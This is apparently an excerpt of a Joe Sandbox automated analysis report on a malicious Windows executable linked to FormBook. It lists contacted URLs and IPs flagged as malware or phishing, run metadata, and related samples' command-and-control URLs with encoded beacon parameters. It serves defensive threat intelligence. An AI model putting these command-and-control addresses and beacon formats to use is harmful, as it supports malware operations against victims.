https://word.office.com	explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.justinmburns.com/ro12/	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.senior-living-91799.bond/ro12/www.riderarea.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.55dy5s.top/ro12/	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.pwpholdings.com/ro12/www.justinmburns.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rptiki.com/ro12/www.tiktok-shop-he.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nsis.sf.net/NSIS_ErrorError	MaMsKRmgXZ.exe, 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmp, MaMsKRmgXZ.exe, 00000000.00000000.9467778286.0000000000409000.00000008.00000001.01000000.00000003.sdmp, MaMsKRmgXZ.exe, 00000002.00000000.9724749786.0000000000409000.00000008.00000001.01000000.00000003.sdmp	false		high
http://www.holzleisten24.shop/ro12/www.xlrj.asia	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://word.office.comt.	explorer.exe, 00000004.00000002.14579257959.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12111240915.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11270980029.000000000D30B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.shuraop.xyz/ro12/	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://api.msn.com/-	explorer.exe, 00000004.00000000.9897491783.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12109712536.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.000000000974E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ps212naming.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.easyeats307.com/ro12/www.doubleapus.com	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.rptiki.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://nsis.sf.net/NSIS_Error	MaMsKRmgXZ.exe, MaMsKRmgXZ.exe, 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmp, MaMsKRmgXZ.exe, 00000000.00000000.9467778286.0000000000409000.00000008.00000001.01000000.00000003.sdmp, MaMsKRmgXZ.exe, 00000002.00000000.9724749786.0000000000409000.00000008.00000001.01000000.00000003.sdmp	false		high
http://www.senior-living-91799.bond	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/sen-mitt-romney-urged-democratic-senators-to-challenge-biden	explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.doubleapus.comReferer:	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000004.00000003.11271243917.000000000D34B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12110546244.000000000D34D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14579496985.000000000D34C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11265701285.000000000D33D000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/markets/europe-gives-mark-zuckerberg-24-hours-to-respond-about-israe	explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.holzleisten24.shopReferer:	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS14	explorer.exe, 00000004.00000003.11271243917.000000000D34B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12110546244.000000000D34D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14579496985.000000000D34C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11265701285.000000000D33D000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.holzleisten24.shop/ro12/	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.xlrj.asia	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.justinmburns.comReferer:	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000004.00000003.12109712536.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.00000000096B4000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.shuraop.xyz/ro12/www.qualityquickprints.com	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://outlook.comQJ	explorer.exe, 00000004.00000003.12109712536.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.00000000096B4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.doubleapus.com	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pwpholdings.com/ro12/	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.senior-living-91799.bond/ro12/	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ns.adobe.co	explorer.exe, 00000004.00000000.9894494720.00000000046F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14565697362.00000000046F6000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.start399.comReferer:	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://img.sedoparking.com	explorer.exe, 00000004.00000002.14584974938.00000000142DF000.00000004.80000000.00040000.00000000.sdmp	false		high
http://www.digitalserviceact.online/ro12/www.ddbetting.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.easyeats307.comReferer:	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiktok-shop-he.com/ro12/	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ktrandnews.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xlrj.asiaReferer:	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000004.00000002.14563116103.00000000026B0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.14572257419.0000000009B40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.14574486597.000000000AB00000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ddbetting.com/ro12/	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.queryF	explorer.exe, 00000004.00000000.9902197549.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11264501949.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14578477014.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.riderarea.com/ro12/www.shuraop.xyz	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.tiktok-shop-he.comReferer:	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.digitalserviceact.online/ro12/	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/odirm	explorer.exe, 00000004.00000002.14570074014.0000000009556000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.0000000009556000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.shuraop.xyz/ro12/www.ktrandnews.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.msn.com/en-us/travel/news/rockets-fly-planes-grounded-americans-struggle-to-escape-war-i	explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.riderarea.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rptiki.comReferer:	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	MaMsKRmgXZ.exe, 00000002.00000001.9728969517.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiktok-shop-he.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppader.icos	explorer.exe, 00000004.00000000.9893746517.00000000030A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14564355374.00000000030A0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew	explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/tm	explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ddbetting.com	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.digitalserviceact.onlineReferer:	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.doubleapus.com/ro12/www.holzleisten24.shop	explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.digitalserviceact.online	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmp	false	Avira URL Cloud: safe	unknown
http://www.holzleisten24.shop	explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.20.84.62	www.riderarea.com	United States	14618	AMAZON-AESUS	true
130.185.109.77	www.holzleisten24.shop	Germany	51191	XIRRADE	true
103.72.68.128	unknown	India	45814	FARIYA-PKFariyaNetworksPvtLtdPK	true
172.177.169.252	www.los3.online	United States	7018	ATT-INTERNET4US	true
15.197.142.173	ddbetting.com	United States	7430	TANDEMUS	true
208.91.197.39	www.ps212naming.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
18.119.154.66	hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com	United States	3	MIT-GATEWAYSUS	false
34.120.249.181	www.55dy5s.top	United States	15169	GOOGLEUS	false
91.195.240.123	www.start399.com	Germany	47846	SEDO-ASDE	true
3.64.163.50	www.qualityquickprints.com	United States	16509	AMAZON-02US	true
154.12.93.8	0826.93cu.com	United States	174	COGENT-174US	true
185.104.28.238	www.digitalserviceact.online	Netherlands	206281	AS-ZXCSNL	true
158.247.235.89	www.ktrandnews.com	United States	26133	FEWPBUS	true
104.18.233.42	name.shoplazza.store	United States	13335	CLOUDFLARENETUS	true
104.247.82.94	www.senior-living-91799.bond	Canada	206834	TEAMINTERNET-CA-ASCA	true
154.197.227.142	www.fathomtackle.com	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	true

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1324095
Start date and time:	2023-10-11 22:53:12 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 18m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	MaMsKRmgXZ.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/9@24/16
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 125 Number of non-executed functions: 317
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: MaMsKRmgXZ.exe

Simulations

Behavior and APIs

Time	Type	Description
22:56:42	API Interceptor	40022464x Sleep call for process: cscript.exe modified
22:56:47	API Interceptor	40031970x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
52.20.84.62	Order_No_455100.doc	Get hash	malicious	FormBook, NSISDropper	Browse	www.eatlust.com/ge06/?efip3=qGPGnUsX6TFV9BU4QGk5jR7a0J5CI2RDnUbnjFQeKZxXuVrLon29Sh8XXjU2N2cmrc7OQg==&RfJ0=UP64Xzx04B
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.22769.14377.rtf	Get hash	malicious	FormBook, NSISDropper	Browse	www.eatlust.com/ge06/?YdOTPj=qGPGnUsX6TFV9BU4QGk5jR7a0J5CI2RDnUbnjFQeKZxXuVrLon29Sh8XXjU2N2cmrc7OQg==&Mrm8=jxod-tahmn98k
	DHL_Shipment_Documents.exe	Get hash	malicious	FormBook	Browse	www.ofcure.com/cy12/?ch=28VU7Uw3BIX29hEcuTL8we0ZfACTIsEv5L/QEmflO0hk/uX1kbW+Xf6qNS6O6uzBAoXT&Mx=HFQl2rBxojSTG
	borilpokonta2.1.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.eatlust.com/ge06/?AlL=qGPGnUsS6UFR9RY0SGk5jR7a0J5CI2RDnUD3/GMfO5xWukHNv3nxElEVUFUJKmktp8ToJSgB1g==&QtC8nT=dnrlOzuxdlIl
	DHL_Shipping_Documents.exe	Get hash	malicious	FormBook	Browse	www.ofcure.com/cy12/?kPjLRz=28VU7Uw3BIX29hEcuTL8we0ZfACTIsEv5L/QEmflO0hk/uX1kbW+Xf6qNRa0q/T5aP2U&P0=AvPhzfA
	rock990ro0.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.strongblitz.com/r08c/?EDH=1cl1sKQX7PfPO+6cT6raRWYFtvSFMKAlkozqdXVfL4Hila/gStM3DFrthqAZm6YFOIGt&0VNTa2=zRipo8OXZt
	PO#00986.pdf.exe	Get hash	malicious	FormBook	Browse	www.hitbass.com/6t6v/?CzX3ILw=N1hiv5BZyKJsjOUgYShZtrU9QmsS+AgE+jwGtd0NIA0X82dLPd6GUhSm2hw0eTK1x8tOrBG/Nm806/trbSAqCgqhiRfGx4CJAQ==&aSZN4=lDXg
	wininit.exe	Get hash	malicious	FormBook	Browse	www.promptyum.com/pta7/?5Zv6v=HssvRjWA886A&io5hOT=51fXUovDvl40Gay+bjKREe4rQDGYR1Bn3rNklAoym8RSa3YWX1JZTuOsjckpgYoBm3td0rVKzVyRloE9vZyLrMI8G4UELEyC8Q==
	9t0qjhF7ce.exe	Get hash	malicious	FormBook	Browse	www.promptyum.com/pta7/?0v4yn=51fXUovDvl40Gay/XhK+V9QrPy2bAXZn3rNklAoym8RSa3YWX1JZTuOsjckpgYoBm3td0rVKzVyRloE9vZyKrLVhKccnLXPl8Q==&qI=vz6ROrLlU_23eZF
	5890796959.xls	Get hash	malicious	FormBook	Browse	www.promptyum.com/pta7/?Hr=51fXUovDvl40Gay+JjKuEeorGS2ESVBn3rNklAoym8RSa3YWX1JZVvP1mooqhecBmHsju7ND43XQhJ0Tv4umz7N4Pbs/IU+Rx7LnibE=&fv=pb54k_ckcgKo
	5890796959.xls	Get hash	malicious	FormBook	Browse	www.promptyum.com/pta7/?T8xV=8BiXgCdDxVxO&uGnojj=51fXUovDvl40Gay+JjKuEeorGS2ESVBn3rNklAoym8RSa3YWX1JZVvP1mooqhecBmHsju7ND43XQhJ0Tv4umz7N4Pbs/IU+Rx7LnibE=
	specifik#U00e1ci#U00f3k.xls	Get hash	malicious	FormBook	Browse	www.promptyum.com/pta7/?Iv=51fXUovDvl40Gay+JjKuEeorGS2ESVBn3rNklAoym8RSa3YWX1JZVvP1mooqhecBmHsju7ND43XQhJ0Tv4umz7N4Pbs/IU+Rx7LnibE=&wDlhgT=ChaYXozdAlwb1SV
	PO#88900.pdf.exe	Get hash	malicious	FormBook	Browse	www.hitbass.com/6t6v/?Ltcim=N1hiv5BZyKJsjOUkTWl27os9P28N520E+jwGtd0NIA0X82dLPd6GUhSm2hw0eTK1x8tOrBG/Nm806/trbSAnCiSw2Ea43r2vAQ==&Y_-Ml=rzGZjNw
	ORDER_NO_21.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.domainappraisalbot.com/i9u8/?uoAi-=Mnix169fH44u34TcNELonqW5de5km1ngSaf3OXUA6GPSQrfheFKaOogrI6dbd0IfJe63J+jNmObyMzPGhxnjglqNia1Puc17Ig==&D-zAgK=hAlqJ9KvMOFA0SMR
	doleful.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.refreshbee.com/fn9x/?ok5=Eb0ZofF0CY4Apb4N8zPZb7L97HKLFIOYX+mhR1LaUKOP0vOzLOFVo62atykQzeiCk6zsFIj+TlnSAEof2inqem1eHr13qnYloA==&1h=s-sFvjTN1qMBJZ
	1769 - 02765-23pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.promptyum.com/ohrd/?I_=uGHSXeuKsDuCjv&rOJAh1=fH+Z0lS0btMIBYeRAcJTgL9gKO2HfjtpsgqREbcdi7ctk/w2CyoPp25uYd0YKJ+xpBgwt4+pGXyxLhjzqxj1Oy0Jf1prEqwBpA==
	Facturas P1756770002-pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.promptyum.com/ohrd/?GXu=jK1OytkcX-3o&dFdl6Jbz=fH+Z0lS0btMIBYeRAcJTgL9gKO2HfjtpsgqREbcdi7ctk/w2CyoPp25uYd0YKJ+xpBgwt4+pGXyxLhjzqxj1Oy0Jf1prEqwBpA==
	THREE_quotations.exe	Get hash	malicious	FormBook	Browse	www.visizzle.com/ct45/?N2MXz8Zp=MIcYN5XQ28O8a6VVd978rwCRLj4f8qPrnN2VczxCqfD19GCnmh3Rwc1B882E5ppKMGQP&5jFT8R=NR-TMbhPKF7TLBJP
	GlobalImagingDocuments9575734549684.vbs	Get hash	malicious	FormBook	Browse	www.nichevesting.com/g0c0/?J1ZahCdL=4D8KR/+l2rJ4yEknA3NwL/xew2D800GqbWuv46luKoyREYUfmcWzY8S0FaFCA4RxGPUwgCES1+CGDKu8j/pMqbkqVClt2I2j7UamBTzpVw1B&uEk=kKVhb1ODb
	Inquiry.exe	Get hash	malicious	FormBook	Browse	www.guidearena.com/be09/?3fS08=GFNDWPhPstNTTPX&bZ=S/w09qVq+ZQeeq4pvSPTFDjmsSSIr8LB1qIv/B9bTCwoiT8aZxj2+D7nBO3gJrJ8ewPx

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
name.shoplazza.store	SOA_OCT.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.18.233.42
	Statement_PDF.exe	Get hash	malicious	FormBook, NSISDropper	Browse	104.18.232.42
	F#U0130YAT_TALEB#U0130-SALTIKMAKINA__AS_BESTKALIP_A.S.exe	Get hash	malicious	FormBook, RedLine	Browse	104.18.232.42
	Statement_Of_Account_2023.exe	Get hash	malicious	FormBook	Browse	104.18.233.42
	INVOICE_180923.xls	Get hash	malicious	FormBook	Browse	104.18.232.42
	Purchase_order_B086651.exe	Get hash	malicious	FormBook	Browse	104.18.233.42
	Revised_Order_pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	104.18.233.42
	HqpUYSfBin.exe	Get hash	malicious	FormBook	Browse	104.18.155.120
	PO._4300000894.exe	Get hash	malicious	FormBook, NSISDropper	Browse	104.18.128.14
	MT103-BIBBC2164179.docx.doc	Get hash	malicious	FormBook	Browse	104.18.129.14
	Order_List_pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	104.18.128.14
	DHEOjeEYpt.rtf	Get hash	malicious	FormBook	Browse	104.18.129.14
	obizx.bin.exe	Get hash	malicious	FormBook	Browse	104.18.129.14
	IfsJnM5O1i.exe	Get hash	malicious	FormBook	Browse	104.18.128.14
	4086EA3B.doc	Get hash	malicious	FormBook	Browse	104.18.129.14
	EUR_17,970.25.exe	Get hash	malicious	FormBook, NSISDropper	Browse	104.18.129.14
	swift103.exe	Get hash	malicious	FormBook, NSISDropper	Browse	104.18.128.14
	8xJM9UqqLp.exe	Get hash	malicious	FormBook	Browse	104.18.128.14
	http://daisda.com	Get hash	malicious	Unknown	Browse	104.18.128.14
	http://www.saokm.top	Get hash	malicious	Unknown	Browse	104.18.129.14
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com	RE_SWIFT_DOZNAKA_1_pdf.exe	Get hash	malicious	FormBook	Browse	3.140.13.188
	Invoice_Statement_.xls	Get hash	malicious	FormBook	Browse	18.119.154.66
	Gqzfnpjnobzwyu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	3.140.13.188
	8EiqG83s9D.exe	Get hash	malicious	FormBook	Browse	18.119.154.66
	file.exe	Get hash	malicious	Amadey, Djvu, Fabookie, LummaC Stealer, RedLine, SmokeLoader	Browse	18.119.154.66
	file.exe	Get hash	malicious	Amadey, Djvu, Fabookie, LummaC Stealer, RedLine, SmokeLoader	Browse	18.119.154.66
	Quotation.exe	Get hash	malicious	FormBook	Browse	18.119.154.66
	39760557.exe	Get hash	malicious	Upatre	Browse	3.140.13.188
	168622882350101	Get hash	malicious	Unknown	Browse	18.119.154.66
	SecuriteInfo.com.Variant.Zusy.476566.32759.1467.exe	Get hash	malicious	FormBook	Browse	3.140.13.188
	DHL_Receipt276334VWE.exe	Get hash	malicious	FormBook, NSISDropper	Browse	18.119.154.66
	0IwziVq2Dr.exe	Get hash	malicious	FormBook, GuLoader	Browse	3.140.13.188
	4s14EZ9Cja.html	Get hash	malicious	Unknown	Browse	18.119.154.66
	VyP5C3ENIH	Get hash	malicious	Unknown	Browse	18.119.154.66
	Quotation.exe	Get hash	malicious	FormBook	Browse	18.119.154.66
	BHW_NB2163_2023-04-05_14_35_43.862	Get hash	malicious	Unknown	Browse	18.119.154.66
	SecuriteInfo.com.XF.AShadow.1000.5196.20073.xlsx	Get hash	malicious	Unknown	Browse	18.119.154.66
	Order confirmation proforma Invoice.exe	Get hash	malicious	DBatLoader, FormBook	Browse	18.119.154.66
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	3.140.13.188
	Specifications photos.exe	Get hash	malicious	FormBook, GuLoader	Browse	3.140.13.188
www.senior-living-91799.bond	SOA_OCT.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.247.82.94
www.senior-living-91799.bond	Invoice_Statement_.xls	Get hash	malicious	FormBook	Browse	104.247.82.94
www.los3.online	Vjsl1VvL4Z.exe	Get hash	malicious	FormBook	Browse	172.177.169.252
www.ps212naming.com	Invoice_Statement_.xls	Get hash	malicious	FormBook	Browse	208.91.197.39

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	https://net.addresstwo.com/api/EmailLinkClickCount?emrc=jqdhmjd1_loc_ld.bnl&l=23546570&t=9661	Get hash	malicious	Unknown	Browse	3.94.218.138
	https://bs.serving-sys.com/Serving/adServer.bs?cn=brd&ns=1&pli=1079576784&gdpr=$%7BGDPR%7D&gdpr	Get hash	malicious	Unknown	Browse	18.209.26.180
